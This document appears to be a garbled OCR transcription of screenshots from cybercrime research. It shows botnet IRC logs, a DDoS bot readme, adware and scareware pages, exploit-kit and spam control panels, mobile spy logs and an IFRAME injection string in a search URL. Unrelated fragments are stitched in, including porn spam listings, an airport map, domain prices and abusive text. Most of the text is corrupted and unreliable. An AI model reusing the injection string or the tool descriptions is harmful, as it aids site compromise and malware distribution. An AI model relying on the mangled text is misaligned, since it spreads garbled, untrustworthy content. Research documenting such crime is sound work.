search. bloomingdales.com/exec/?PseudoCat=b.comSearch&.q=ATLASLOOT%20% 
3CIFRAME%20sre=//89. 149.243.201A%3E - BGK - Cached - Similar pages 


Bloomingdale's: DEADLY-BOSS-MODS IFRAME src=/89.149.243.201/t ... 


Sorry, we did not find any results for DEADLY-BOSS-MODS IFRAME src=//89.149.243.201/. 
Search Again. Please try again using an alternate spelling or keyword ... 
search. bloomingdales. corny, ../89.149.243.201A%3E - 66k - Cached - Similar pages 
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{ 
|= [@0/xP)5°2]-T8pe 
* [9e)4P; 32) 
|= [O8/P;SP2}-wrot (usaer? 


+ [C8] xP)5Fs)-Cerew (esee 
|has joined Shanat 
|* [OO] xP,SF2)-FYeCwN, (Seem. 
|= [OO/AP)SP2)}-FYncDRoty (Comm? 
felerd srandes 

[00] AP |S02 opener ete (usners 
= [OO/AP [SPS] -DGqnetqne (usaast: 
|= [Q8)xP|SP2]}-PecMmkYN (USAES? 
= [OO]xPSP2}-FaFzetkx (usa@s? 


|= [@0)xP)SP2}-wqqupl (usearte 6 


|= [@O)xP,SF2}-mry (TmewIzs.25. 


[e0)2"359"2)-C¥ 
[ee] 289) 5"2)-0 
(00) 235592] -10 
(00) 2835572) -qe 
[ 00) 23) 5F2 }-ux 
[00] 283) 5F2 }-yz 
(00) 2"3)502)-2 


<[00)P)SP2}-Jeaa> (miee- eer) 
<[00/5P|5F2}-Orterrict> [ees-es7 
<{[@0| EP |SP2}-Opers> [HTTP]: Comection Cstabti 
<[@0[ EP |SP2}-Opes> [HTIP]: Transfer Conpi 
¢[@0|XP|SP2]-Oyrs> [MSOR-O67]: Exploited IF 
€[@O|SP(SP2)-ctwawd [HTTP]: Transfer Compie' 
<[@0| XP |SP2}-cTwaw> [1508-057]: Explet i: 
¢[@0|2P|SF2)-OFEezrEct> [HITF): Comnection Es! 
<¢[ 00/27) SF2)-OFEezrEct> (HITF): Transfer Comp) 
<[ 00/57 |SF2)}-OFEderEct> (Mee-es7]: Cxploites 
<{@O[ EP ISH} -cvErhw> [wit Comection Estab) 
<[ QO) P|SFI}-evErRe> [ett aaster Conplete 
¢[OO/AP]SPI}-c¥ErRw> [MSee- 867]: Exploited IF: 
¢[@0|5P|SF2}-Byrs> [NITP]: Connection Cstabtis 
<[@0|5P|SP2}-Oyrs> [HTIP]: Transfer Conplet 
<[@0|5P|5P2]-Byrs> [MIOR-O67]; Exploited IP; 4 
<[ 00/2? |SP2)}-Bprs> [HTTP]: Comection Establis 
¢[@0|2P (| SF2)-Bges> [WITP]: Transfer Complete: 
<[ 90/57 |SF2}-Byes> [MeR-e67}: Exploited tr: 1 
<[eejary pretticerx> part Conmection Esta 
<[00/2P]SP1}-akvlt> [MTIF JS Transter Compte: 
¢[ QO AP |SPI}-akvle> [N6e-O57]= Exploited 1 
€[OO|XP|SF2}<IrrIGsO1> [ATIF]: Consection fst 
<[@0|3P|SP2]-IrrIGSOT> [TIP]: Trasster Conple 
<[@0|3P|SP2}-IrrTesOT> [MSe8-O67): Exploites 3 


23-7618 
123 (29.00 HB), (Total Seeds: 3) 
7 


Gt 197. 196,9, 16R 1675S 

(7.196.918 (29.00 88), (Total Seeds: 3) 
“196.3. 088 

78 .22%.20.19: 18632 

*. 19 (29.08 EB), (Total Senes: 1) 


1922756 

192 (29,00 0B), (Total Seeds; 
6.10 
17196 6 2OOTTSO18 
+6. 209 (29.00 OB), (Total Sends: 
6.2 
fr 999. 988.19 276 
4.2.58 (29.08 HB), (Total Sends: 2) 
1.7.4 
ft: 89.75.9.188=7001 
25.09.1898 (29.08 KB), (Total Sends: 1) 
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’ Hey there! bi - ti 
Hey there! biehl89 is using Join today! 
| Twitter. 


El biehl89 


i sweet http://a.gd/649be 
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Get WinRAR for FREE 


Zango's toolbar for IE, Outlook/Outlook Express and Word provides FREE access to premium content, including 
weather, paid for by advertising. Based on keywords generated by your browsing, Zango shows ads in a 
separate browser window or a temporary Slider, and toolbar search suggestions. ShopperReports provides 
comparison shopping offers in a Sidebar. Both run continuously and update automatically. Uninstall easily via 
Add/Remove Programs. 


For more information: Best Practices, Privacy Policy, = View EULA, Print EULA 


(Qune 3, 2008) v 


™ Yes, | want free ShopperReports too View TOY | Print TOU 


[¥] By clicking “ Start’, | represent that | (1) am at least 18, (2) agree to the EULA and Privacy 
Policy terms and (3) consent to install Zango and, if selected, ShopperReports, and ee i 
access winrar.freedis.info. 


Cancel 
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Web Results 1- 10 


Free WinzipDownload Sponsored Links 
.freedis info Download WinzipDownload Utility & Decompress tool free full version 


Win ip Free Download 
www.Snaped.com/winzip Download 100% Free. Latest Version Live Technical Support Available 


WinZip® - Download Evaluation Page 


Registered users of WinZip 10.0 looking for Build 7245 can learn how to download the free 
update now. WinZip 12.0 is not a free upgrade for users running ... 
www. winzip.com/downwz.htm - 20k - Cached - Similar pages 


WinZip® - The Zip File Utility for Windows - Zip/Unzip. Enc: 


WinZip is a Registered Trademark of WinZip International LLC. * WinZip is $ NOT Free Software 
If you are satisfied with the free trial of our software, . 

www.winzip.cony - 20k - Cached - Similar pages 

More results from www winzip com » 


WinZip - Free software downloads and reviews - CNET Download.com 
Come to CNET Download.com for free and safe WinZip downloads. Zip and unzip your files 
quickly to conserve disk space and greatly reduce e-mail transmission ... 
www.download.com/WinZip/3000-2250_4-10003164 html - 97k - Cached - Similar pages 


WinZip - Free Software Downloads and Software Reviews - Download.com 
WinZip - Handle ZIP files with ease with this popular utility. - Review and free download at 
Download.com. 

www.download.com/3405-2250-5155091 html - 15k - Cached - Similar pages 

More results from www download com » 
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Zango's toolbar for IE, Outlook/Outlook Express and Word provides FREE access to premium content, including 
weather, paid for by advertising. Based on keywords generated by your browsing, Zango shows ads in a 
separate browser window or a temporary Slider, and toolbar search suggestions. ShopperReports provides 
comparison shopping offers in a Sidebar. Both run continuously and update automatically. Uninstall easily via 


Add/Remove Programs. 
For more information: Best Practices, Privacy Policy, FAQ, View EULA, Print EULA 


Zango, Inc. 
End User License Agreement 


(June 3, 2008) v 


™) Yes, | want free ShopperReports too View TOY | Print TOU 


[M] By clicking "Start", | represent that I (1) am at least 18, (2) agree to the EULA and Privacy 


Policy terms and (3) consent to install Zango and, if selected, ShopperReports, and Z oan ‘os 
access winzip.freedis.info. 


Cancel Click "Start" to install Zango 
and access this website for free. 
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j Report 


3 bemnb.nip 
Recerved: 2009-08-05 1704151 


F-Prot 4.44.56 2009-8-4 22:49:7 ok 
BitDefender —v7.60825 2009-8-5 16:25:8 ok 2.45 
AVG 85.206 2009-8-1 14:47:24 ok 

F-Secure 7.02 build 73807 2009-8-5 15:50:58 Trojan-ArcBomb.ZIP,Bubl.b (AVP) 
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Stats 


| S minutes | 1 hour | 24 hours | Total | 


tes 

Bots coust 670 882 1967 31009 
Unique serials 663 862 1892 14292 
Bots with sniffer loaded 3660-488 1091 10804 
New bots 0 0 0 31009 
New emaqee serials 0 0 0 14292 
DMPM up 83 days, 941, O users, load averages: 1.38, 1.01, 0.91 


Interestingly, on the majority of occasions cybercriminals tend to undermine the level of 
operational security that they could have achieved at the first place, and this is one of those 
cases where their misconfigured botnet command and control allows other cybercriminals to 
hijack their botnet, and security researchers to shut it down effectively. 


The people behind this money laundering organization are either lazy, or ignorant to the 
point where the botnet’s command and control interface would be using the very same web 
server that they use for recruitment purposes. 


Here are some screenshots of their command and control interface used exclusively for 
spam campaigns: 
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‘i. 


bot 


conf .tot CONFIG. exe ddoser.rar — Pachddos.bat 


RS SSSas SS 


README.txt 
TexcToseel actyrerr 


Maeseet. an 4 PK ISG ’ ddoser exe 
) README.txt « Broxnor 


@ein Mpsexs Toomer 
WTREADME ~ i 


1. ner, YpPA gAaoc. Nocnesnwo MOKHO wsaTe ANA Har 
2. MazsHaveHme 660TaM OTAENeKEX ZagaKHin 


= o BO 192.74.96/~2qV cmd. 
. obxon gdampeona wepes JOBepeKkWM Npouecc - svchos "I 
4. MHOrONOTOUHOCTS. 


3 

S$. HeewpywocTe 8 npoueccax, 

6. MecTaWAapTHar aBTosarpy3Kka. 
7, BaxayKxa anos. 
8 
9 


Pe = 
Crpsexa 


. ¥ Kawgoro bora ceoh yHnkanbHwit Kmou. KOTOpw MOMHO M3MeHHT 
. YeTaMoeka BwOpaKHoro BawH dalina Ka ARoc Cepsepn, 

10. BuMONnKeHHe KOMaHA. 

Hi. Nocunka cooGwexna. 

12. 8ce 3TO 8 12 Kunobaitrax. 


Hasnavenne dance. 


ddoser.rar = unTrcruma agoc cepsep, 

ddoser.exe — uncTHit dain p~poc cepsepa, He 3aNakOBaHHWit BeCcHT 
ONFIG,exe = npowneka ypna e@ dain ddoser. exe, 

Bulld.bat - co3qanHe npycaakm wepBA K BawieMy ANOCy. HasMBaeTC 
atraunr x cebe ddoser.exe on aonxen Gute yee HacTpoen, 
orm/option.inc - HacTpowKn Bopma. 

orm/ki lier /svc. ine 

orm/ki Vier /proc. inc 

PMaster.exe = 2Ta Npora ANA BurpysKn Ccepeepa, ecnw Bu BApyr p 


ond - 3fecb alin ANA KONMAHHA WeHTPa. 


KoHpurypauya. 
(op iNpewne HyxHO yCTaHOBHMT’ CKPHNT ynpaBNennA. OK HanwcaH Ha PHP B,00K5 = Ga Moivowecrep 
Nowa Rasa AAMuuW xian TeveToenk haan R nahenaronuuy venoeuay + KB Nofi konnesorep 
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Based on AV-Test.org Submission-ID: 
2010-03-18_09-01_0002 
Source: AV-Test.org 


Time Difference 


Antivir 
Authentium 

Avast 

AVG 

BitDefender 
CA-AV 

ClamAyv 

OrWeb 

Eset Nod32 
Fortinet 

F-Prot 

F-Secure 

G Data 

Ikarus 

ISS VPS 

kK? Computing 
Kaspersky 
Kaspersky (Cons.) 
hicAfee 

McAfee GVY Edition 
Microsoft 

Norman 

Panda 

PC Tools 
QuickHeal 

Rising 

Sophos 

Spybot S&D 
Sunbelt 

Symantec 

Trend Micro 

Trend Micro (Cons.) 
VBA32 
VirusBuster 
Webroot 
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from Commtouch 
Source: Commtouch 


archive damaged 
W32/FraudPackfam!tr 


Win32:MalOb-AL [Cryp] 


Mal/BredoZp-C 


Mal/BredoZp-C 
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The pom star book be a interracial pom often at the business and free cartoon pom. All free 
pom sites have her bonus and latin porn now in his fashion ... 
freeporn.eee. bridger-mt.gow206. html - 17k - Cached - Similar pages 


There be the percent soon. How now look or horse sex play! | produce his adult sex group 
better, and we be the grin too. Own policeman and free porn films ... 
freeporn.eee. bridger-mt.gow54 html - 16k - Cached - Similar pages 


How actually yahoo adult groups bel You slide the crossing only; i doubt the rule and group 
gay sex again. What wrong ribbon or adult film be! ... 
freeporn. eee. bridger-mt. gow227 html - 16k - Cached - Similar pages 


| implement the online sex least, but also they invest his value least. She build the death or 
free pom vids originally, It withdraw their change and pom ... 
freepom_eee. bridger-mt. gow567 html - 18k - Cached - Similar pages 


lt make the wornan why. You be their adult personal even, as well as i be that smile and free 
mature sex now. The point have this aim equally from the ... 
freepom. eee. bridger-mt. gow588. html - 18k - Cached - Similar pages 


Can it be around white adult friend finder com? A pom site be a thing or black anal sex so in 
the master, not only the culture or 3d sex have the state out ... 
freepom.eee. bridger-mt. gow612.html - 16k - Cached - Similar pages 


He be no soil or indian porn out. The share and cartoon porn be the shemale sex when by the 
sex cartoons, bat the sex ty leave the manual off of the ... 
freeporn.eee. bridger-mt. gow'154 html - 18k - Cached - Similar pages 


A gender and porn password go many year yesterday upon the doctor and adult movies. The 
mine and aian porn star have the fault or adult movies fucking for ... 
freepom.eee. bridger-mt. gow 157. html - 16k - Cached - Similar pages 


A standard and mobile porn want their way or adult erotic please of the council and free adult 
personals, and the government have the knife and best porn ... 
freepom.eee. bridger-mt.gow - 24k - Cached - Similar pages 


What major percent highlight! What simple telephone replace! How just audience and adult 
video stores fly! Do who say on safe election or homemade sex? ... 
freeporn.eee. bridger-mt. gow'466. html - 22k - Cached - Similar pages 
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Datei Hilfe 
~ Paket-Konfiguration 

LID | Backdoor process name explorer 
Middleware a YoIP-Tap process name wuauclt 
Receiver | Hidden directory name Applications \IExplorer 
Entertainer e Entertainer einfaus Ton-Qualitaet 

@ Ein © Aus @ Hoch © Tief 
Ringspeicher (MB) [1000 

Remote shell Silent Modus 

C €in 


* $/1000 pacuntbeaerca no chopryne Cymva npoAamx + Cymma pe@epanos Ha 1000 nocetntenert 
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fata 
2008-11-16 
2008-11-17 
2008-11-18 
2008-11-19 
2008-11-20 
2008-11-21 
2008-11-22 
2008-11-23 
2008-11-24 
2008-11-25 
2008-11-26 
2008-11-27 
2008-11-28 
2008-11-29 
2008-11-30 


packet builder v 0.6 


Tpacbun 
(ynnKn) 


$103 
2971 
3807 
3874 
3846 
4155 
2199 
3398 
4423 
4299 
5228 
5264 
5323 
5512 
6263 
65665 


645 
233 
324 
322 
634 
545 
1616 
417 
324 
335 
S31 
510 
7518 


10 
120 
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300 
3645 
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Cnvcano 
38 pecanan 
4 4apAmbaKn 


it) 


oooeogoqoge9sgeesesoeoeegceeses9seses 8&8 & 


Peep 


15 


BCErO 
211.5 
135 
240 
255 
210 
210 
150 
181.5 
225 
271.5 
271.5 
300 
270 
330 
300 
3651 


$/1000 * 
41.15 
75.73 
63.04 
65.82 
54.60 
50.54 
68.21 
52.97 
50.87 

62.8 
51.64 
56.99 
50.72 
59.86 
47.90 
56.85 


Check out our Domain Sermices Domain FAQs 
low prices 


Bulk a etd Pricing cae Year (per domain) FREE Privacy for your .COM, 
All prices are listed in United States dollars ($). INFO. MOBI NET ORG. Tv 
1-5 6-20 21-49 50-100 101-200 201-500 .ME, .BIZ, .WS and .CC domain 
Privacy FREE** FREE** FREE** FREE** FREE** FREE* when youregister five or more 


.COM* 1 yr 875 875 875 8.55 8.15 7.99 domains at one time. 
2ys— 875) 875) 875 (8.55 8.15 7.99 
3yws— 8x70) 875) (8.758.558 8.15 7.99 
5yis_—_—_- 855) B75) 8758.55 8.15 7.99 
ys 999 875 875 8.55 8.15 7.99 
SAVE! 999 999 898 899 3899 9.99 


= View full price chart 
= Compare our Prices! 
= Manage My Domains 


iuro* 1" 199 199 199 199 4.99 4.99  * Plus ICANN fee of 20 cents per 
MOBI tyr = 1499 1499 1499 1499 1499 1499 og faa 
ET* 1 yr 999, 999° 899 899° 899 899 a wnen you register five or more 
ORG* 1yr 999 999 899 899° 899 8.99 eligible domains. 
TV 4yr 3999 3999 3999 3999 3999 3999 
US tyr g99 999 999 999 4999 999 


‘ME 1yr 19.99 1999 1999 1999 1999 19.99 
-BIZ* 1yr 999 999 $8699 £899 8.99 6.99 
‘WS 1yr 999; 999) 9.75) 9.99 9.99 9.99 
-ASIA* 1yr 19.99 1999 1999 1999 1999 19.99 
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FOR DELEGATES ARRIVING BY TAXI 


After Ge Terrsizal 1, > & } canned ack he taal ever to sry 
fe Jed Lane, The tex eB pas 2 ramp leading to Tromsul } 
afer which Ge tne reeds to take the first lef and next right to 
‘Be Ques Bedding Coxd pk Prom Ge trove of Ge Queen: 

Wale Deoaph Me rene enteesce. Thine te wtnies on he 
Jef te Gee Sirk floor, Ader pow have parsed Geoegh a ret of 
Goces at the Sep of these tubes take 3 be nod ieeemectiate right 
to Jom the rocte map at poss Qt 


BusinessCentre 


Travelex 


y 


TERMINAL TWO 


FIRST FLOOR DEPART URED ARRIVALS 
(UPPER FLOOR) 


‘Take Ge Meatwow Experts Tram 0 Termmnais 1.2 & 3 ane 
then toliow the eremes Grecoors Gbove kt), from Keaaere 
OCs Winy Les 2 te coco ens: 

C6 Gta FY OEE Corer PR? 
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FRAGUS Statistics | Files | Sellers | Traffic links | Preferences | Logout 


Total statistics: 
& Add seller 


: en 
Hosts: 114 
Exploits: El mdac 
<* 9 
Frags: 26 Bw onc 


Percentage: 22.815 aotwinamp 


snapshot 
com 
spreadsheet 
wt 
' Add 


Sellers list: 
Seller name Uploading file Exploits Hosts Frags Percentage 
aolwinamp, pdf 
Testinge tshow, ms09002, snapshot 114 


spreadsheet 


Powered by Fragus 
Sales: 99-68-78 
Support: 99-69-78 
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ots [3100 ais nes rate 


=e ee a Cn 


Grwer va SMT (Arewelied or bleckiated) 
Geren ve SMTP (Aremalied or bleckinted) 
Grver ve SMT (Aromalied or bleckiated) 
Geren ve SMTP (Aremalied or bleckinted) 
Grver va EMTS (Aremelied or bleckinated) 
Geren ve EMTE (Arewalied or bleckinted) 
Connection feted: $100813: Aremelied oF 
Gren vo EMTS (Aromelied or bleckinated) 
Grver ve EMTD (Aremelied or bieckiuated) 
Grven ve EMTE (Aremelied or beckinted) 
Grven ve EMTE (Aremalied or bleckinted) 
Grven ve EMTD (Arenalied or bieckisted) 
Grven ve EMTE (Aremalied or bleckinted) 
Grven we EMTP (Arenalied or bleckisted) 
Connection feted: 6180813: Arenelied oF 
Geren ve EMTD (Arenalied or bleckiated) 
Grven vo EMTE (Aremalied or bleckinted) 
Geren ve SMTP (Arenalied or bieckiated) 
Grven vo SMTP (Arenalied or bleckinted) 
Geren ve SMTP (Arenalied or bieckiuted) 
Gren ve EMTS (Aremalied o bieckinted) 
Geren we EMTD (Arenalied or bleckiuted) 
Geren ve EMTS (Arenelied or bleckinted) 
Geren ve SMTD (Arenalied or bieckiated) 
Grven ve SMTE (frenalied or bleckinted) 
Geren ve SMTP (Arenalied or biecktnted) 
Grwer va SMTE (Aremalied or bieckinted) 
Geren ve SMTP (Arenalied or bleckiated) 
Grwen ve SMT (Arewalied or bleckinted) 
Geven ve SMTP (Arenalied or bieckiated) 
Gren ve EMTS (Arewalied or bieckinted) 
Geren ve SMTP (Arewalied or bleckinted) 
Gren ve EMTS (frewelied or bleckinted) 
Connection fated: 8180813: frenelied o: 
Gren ve EMTS (fremelied or bieckinted) 
Grver ve EMTS (frewelied or bleckitated) 
Grver ve EMTS (Arewelied or bieckinted) 
Gwen ve EMTS (Arewelied or bleckinated) 
Gren ve EMTS (Arewelied or bleckinted) 
Grven ve EMT (Arenalied or bleckisted) 
Cormection feted: $180813: frewelied oF 
Gever ve EMTD (Arewalied or blacklisted) 
Grver ve EMTS (Arewelied or bleckinated) 
Grver ve EMTD (Arewaiied or bleckisted) 
Geven ve EMTD (Arenelied or bleckinted) 
Commection feted: 8180813: frewelied oF 
Ger ve SMTP (frewalied or bleckinted) 
Grver ve SMTP (Arewalied or blacklisted) 
Grven ve EMTS (Arewslied or bleckiated) 
Grver ve SMTP (frewalied or bleckinted) 
Grver ve EMTS (Arewalied or bleckiated) 
Geren vo SMTP (Hrewalied or bleckisted) 
Connection feted: 8180813: frewelied of 
Connection feted: $180813) Arewelled oF 
Connection tailed: RIANA: Armealled oa 


Monteg. 23. Mei 2009 01141104 JuQ0d= ARLITE 


Montag. 23, Mei 2009 01/4103 J1Q09= AZLa7e 


Montag. 23. Mei 200901/41101 J100) = AZLa7e 


HEN 
HR 


2265 
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CAPTCHA DECODE 


: 
ar 
Sic 0 Soi oon © eae sie war a2 ————| rom |so0| Vary 


Home 

Real Estate 
Company 
tty HomeP 
Captchs 0 


6897 254 
5544220 


745354084417 
79 32 47'S 5" e748 


Gri. @SRK T2ay sfax eer, 
79°99 -GERZ Sxwg. sda ‘OGCH, 


@ http://www farinews.com/ - Onginal Source 


Format 


a Shes Sheet yp litle Shetel yl ne Guys ylocsli>t/a> 
</dsv> 
<div 

Class"lead™> Ly wins golaid! Gpsmset pas te yld gp! pf pre 

ee Ar pny py Syed gy Pei pe Giys peyl ad vier 

eect ghee Sept atmbae wget 2d culgt ylocolipy py! ad S350 

Shee pm ol pete! pret Ct at pibte! 9 Stat plow Bude? 
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Yourself 


To see what you'd look like as a cartoon, 


[281] click here 


Cash 4 Toolbar is a one of a bind afihate prograrr! There is no traffic that we Cannot Convert on 
With over rane years of combined expenence in the internet business we have bull a program that is 
virtually one of the easiest ways to make money with You must have heard this sertence many 
times before, but we tel you why @ is true wih us. The way cur program works is that the surfer wil 
S00 an active-x prompt and f they chck yes ft will install a toolbar on thee computer and you get 
paid! I's that sengle. Al the same time you get recurring money and trafic back as well Many pay 
pet-nstal programs hyack afihate Codes whech is the only way they Can pay you, but wih us we 
aisure you no hyacking of afihate codes wil be Gone! We have worked on our program for many 
morths to make sure we Can afford the rates we pay and ¢ you don! bebeve us cick here to natal 
the toolbar and check your hosts Sle ce any fle whenever you wart and you will see nothang of that 
soft! We make our money with the toolbar, users stan page, as well as contextual pops 


With our program you get the following 


PERLINSTALL 
We will pay you $0.15 per stall for Untied States, Urdted Kingdom, and Canada as wel as $0.0! 
pet mata for afl other countnes 


TOOLBAR LINKS 
When the user installs the toolbar 4 will carry your sponsor codes 25% of the time 0 the more 
mstets you get the more money you make wth the toolbar de® m the bong run 


TRAFFIC BACK 

When the surter mstals the toolbar they wil also Rave a new Doobmark mn thee favontes whch wil 
9° 10 a website of your choice and the narne as well Over a period of time you wil ind yourself 
Qrtting a constant Sow of trafic to help you grow your website wih new vistors al the time! 


REFERRING WEBMASTERS 


We wil pay you 10% of all commission made by webmasters you refer to Cath 4 Toolbar 


Our goal is chear and sierple! We want you to make money from your trafic nm a way you would never 
have thought of Signup get the code... put 4 on your wedsite... start making money within seconds! 


Don't believe us? click here to signup and we will prove it to youl 
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Chaos Communication Congress 

Berlin - bcc, 27.-30.12.2008 
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Passive 


Camouflage 


Use of special coverings or coatings to blend the appearance (visual, 
thermal, radar) of objects into the background 


lConcealment 


Use of coverings or terrain to hide objects from threat sensors 


Obscurants Use of smoke or aerosol clouds to provide a sensory barrier between the 
threat sensor and the object 
Decoys Use of false objects to overwhelm, confuse, or redirect threat sensors 


Corner reflectors 


Corner reflectors and similar devices are used to confuse radar sensors 
and obscure real targets 


Communications 
security 


Avoid talking about sensitive subjects over communication links subject 
to monitoring 


Emission control 


Turning off emitters when they might be detected by threat sensors 


Deception Allowing threat sensors to "see" certain possibly scripted activities for 
the purpose of perception management 

| Active 

Spoofing/masking Emitting false signals that are similar to real signals to cover the real 
signals; a type of electronic decoy 

Jamming Emitting noise or some other signal for the purpose of preventing the 


threat sensor from being able to collect the real signals 
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CCDCOE 


Cooperative Cyber Defence 
Centre of Excellence 
Tallinn, Estonia 


Cyber Attacks Against Georgia: 
Legal Lessons Identified 


Eneken Tikk, Kadri Kaska, Kristel Riinnimeri, 
Mari Kert, Anna-Maria Taliharm, Liis Vihul 
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Leaders www.leader.ir 

Parliament www.majlis.ir 

President www .president.ir 

Ministry of Foreign Affairs www.mfa.gov.ir 

Ministry of Justice www judiciary.ir 

Science and Technology Research Department www.msrt.gov.ir 
Ministry of National Defense www.mod.gov.ir 

Ministry of the Interior www.moir.gov.ir 

Department of Health and Medicine www.mohme.gov.ir 

Ministry of Education www.medu.gov.ir 

The Ministry of Culture and Islamic Guidance www-.ershad.gov.ir 
Department of Commerce www.moc.gov.ir 

Ministry of Agriculture Jihad www.maj.gov.ir 

MOFE www.metfa.gov.ir 

Information and Communication Ministry of www.ict.gov.ir 

Road Transport Department www. mrtir 

Ministry of Oil www.nioc.gov.ir 
Department of Energy wwiw.moe.gov.ir 

Mining Industry www.mim.gov.ir 

Cooperatives www.icm.goyv.ir 

Department of Housing and Urban Development www.mbhud.gov.ir 
Of Labor and Social Affairs www. irimlsa.gov.ir 

Ministry of YYelfare and Social Security www.refah.gov.ir 

Central Bank of Iran, Islamic www.cbi.ir 

lranian Customs www.irica.org 

National Statistical Center www.sci.org.ir 

lran mapping bureau www.ncec.org.ir 
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BOASAtqUAOAAERE-DiAA ABE-OAAE sat -OAASA tA sPi-w OEFOAASALE~ 10)" U YEE VASA MAL) Rink Ma Irarsan chicken child, the small A coming. Irarsan chicken child, your mother 


in Iraq for a P, go back to Iraq, your mother, he commited me, “Bada,” I fuck you mother QQ409882525 
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Passwords: © Offer to save pasewords 


© Never save passwords 


Show saved passwords 


Fonts and Languages: Change the defaut fort and 
Change font and language 
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Pie Cat View Gockmaria Widgets Mal [Took Hebb 
ee eae 

© © © > i) @ &§ ba Http: /fearder sujinden pte 8 ~ | 
Q Drednen 9) voxe CD) stor Mode + Orem mses iD to wan @ wom - 


Servers in 6 countries Line.net 
—_ — Your VPN 


AS About Security in Network 


SOLL PRESHIEST C¥VE USe 


NG LASELS SERVICE (hE 
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Pa3zo06s1a¥ 


Ulpweecm ecauy andecp 


Admin Cl 


best regards, 
by Trevelyan $) 
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by Trevelyan $) 


FUCK YOU - 
Admin Cl 


best regards, 
by Trevelyan $) al 


best regards, 


OpenvVPH, pptp, DoubleVPH 


x 5 SPASIBO - Carder Su- A... M + 
Ceo § 8-4 . 
Q Drednen Pam Daages iD wo wan @ imo - 


© Weems ferst Unew ad 


SPASIDO 
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| | 


User Manager 
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“Test_Task 25. Mai 2009 00:59:56) 


Goods 25, unhoceys 2272, bad: 60, total: 1324180. 
Saco oe page 
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[StOCVEWERS 083") 
/ ) CALL LOGS MOBILE SPY 


> View SMS Logs Calls Dialed and Received on Device 
> View Call Logs 
> View GPS Logs 
> View URL Logs a 
> Logs Summary Showing 1 - 15 of 15 records a Download CSV | Show All | Outgoing | Incoming 
> CSV Format 


TIME FROM # TO # DIRECTION DURATION - H:M:S 
JO] *ertceroor [* SiS [EGR | outgoing | oro | 
2009-05-25 | 1 (623) 931- | 1 (602) 973- me 

> Search Logs Ce 
‘Siwation | [ESSER P| ET es [__ameeas | 
> ver Stings J] *iesceroos | iste ™ | G8227% | outgoing | unanenered [0 
(pen) (Lae SRP ERP mene | vee |8] 
{_ CO] *ietesroer [CEE |S" | outgoing | orzae || 
Jo] *esersars [set | E27 | outaoig | os || 
CO] ieee [CER |FSLE7* | outgoing | unanswered | 
JO} *eteeroo [tases [Sze [incoming | unanswered | 
CO] 7ieesoe [EM |S" | outgoing | ororise || 
JO] *riceroor |* Gane GR" | outgoing | ozs |X 
Ol *ieritioer | ES2E7% [GSE | incoming | unanswered | 
Olle elle lS 


2009-05-25 | 1 (602) 973- | 4 (623) 931- 
09:14:00 3963 1598 Incoming 


USERTOOLS ese I 


YOUR CHILDS NAME IS ON THE, 
NO-FLY LIST, MAAM! We CANT 
LET HER BOARD THE PLANE’ 
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| Mein A@d Dumetn Oh con Outh CO Stotus Renem Domes Manage SermeServer Account inte Ceolarrer Suppart 
Wetcome! You ere logged be 


View Dewnalion : Al 
Tes You may sot the domain names by clicking wn the SLD. TLD. wed Expiry Oute hooters 


SPBSSSCKRRES SSB YO ~ HR Ree 
Terrrrrnee eee Re RR Re Ree 


OSRR*-""E-ERER & E78 
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You have @ Gomeln( +) expiring it next 20 deys 
‘You have @ domain(s) that have expired 


"w Cealact the groug of Somame pov wah 1 Hew 
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THEE 


fet wanted Sanus 
Net whecrtes Sanus 
Net weecrted Sgn ue 
Net wheres Sign ae 
Net whecrbes Sign ue 
Net whecibes Sign ap 
Net wibecrbes Sgn up 
Net wabecrtes Sogn ae 
Net weecrtes Sgn we 
Net whecrbes Sgn up 
Nat wibecrbes Sgn up 
Nat ebecrbes Sign up 
Nin wbecrbed Signup 
ean whecebes Sage up 
Nae whecrbed Sign ue 
ten warbet Sonus 
ten waereet Sense 
tet wheirtet Sonus 
Net whites Sanus 
et wheirtet Sonus 
Penk bere’ Sgn ae 


oso 


=] _ 
\ame Antivirus Pro 2010 


test Virus Alerts 


W532. Trojan. Downloader. 
W3I2, Backdoor, j 

Worm. Chernobyi4.¢ 
WI2.FieOeleter.£2.5 
Worm, Trojan.OfficeWorm.k 


atest Threats 


Spyware. Wather.tc 
Spyware.CreditCarder.y 
Adware, Clicker,P2.¢ 
Adware TrojanFactory.f 
Spyware. Dobd.di 


| surf the wed from home 4 lot, and 
that's where | am not protected by 
tech and security guys tke in the 
Office, | fourxd that Antivirus Pro 2010 
perfectly matches my needs, and I've 
been 8 happy user since the first tine | 
instated it. No adware, nO popups, 
nothing like that. 


Roger K. . Sam-datento 


Being not too computer savvy at af, | 
Sti reatized I've got to protect myzeif 
agers a the dangers of modern 
internet somehow. Antivirus Pro 2010 
Offered just what | found perfect, 
nice load of features wrapped into an 
easy to understand interface. I've 
fever wanted to find another program 


What is XP Antivirus Pro 2010 


. dower 


advanced removal capadtitees with state- Pherrat connection, annoying 


of-the-art monitoring and protection popups. 
modules, Antivirus Pro 2010 ts the only 
security software you need for your 
home PC. Equally trusted by companies 
and end users, Antivirus Pro 2010 ts your 
answer to today’s security toues. 


?) How Antivirus Pro 2010 can help you? 


With Antivirus Pro 2010 you have your system cleaned from possible malware 
Mfections, protected ageinct current intrusions and robustly secured against future 
Security alerts, Combining outstanding clearing capaddities with an extensive, 
Constantly expanding database of adware and mahware types and a sophisticated, 
highly ntefigent detection module Antivirus Pro 2010 has everything to become your 
comprehensive home ute security solution in the modern work, 


Antivirus Pro 2010's technology guards you against known, documented dangers and 
emerging, previously urkrmwn types. Its real-time monitor Getects and wards off 
mamwore attacks and hacking attempts while the removal mod.te uses the huge 
Spyware Gatabate to clean your systems from any kind of infection 


e ts spyware really dangerous? 


Spyware t& today’s most talked about security issue taking many forms from 
relatively harmless’ spam scripts which Good your computer with ad popups and 
unsolicited emats to serious virustke programs which steal your private information 
tke passwords and credit card detats. 
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» Protect senative data once and fer all. 


Download no 


PC 


MAGAZINE 


EDITORS 


CHOICI 
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Tofger-A 
Zin-A 

B-S Spy 1.90 
KraAIMer 1.1 


Type Alert level 
Spyware Average 
Spyware Average 
Spyware Danger 
Spyware High 
Virus High 
Virus High 
Virus Citkal 
Spywere Gtkal 
Spyware Gitkal 
Virus Citkal 


a 


8 Warning!!! 364 infected files found 
Click the "Erase all threats” button to erase ail spyware and viruses from Windows 
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Bots | Emails | Templates | Tasks | Sniffer | Admin 


Activated Free bots 


bots 
od [Fit 
Take over Total: 31008 Page: 123... 310 311 Show: 50 200 per page 


Call 31008 items 


Free bots 


17971 15 7002-190E 

5 18001 is G @ 2.103  AB6C-668C —— 
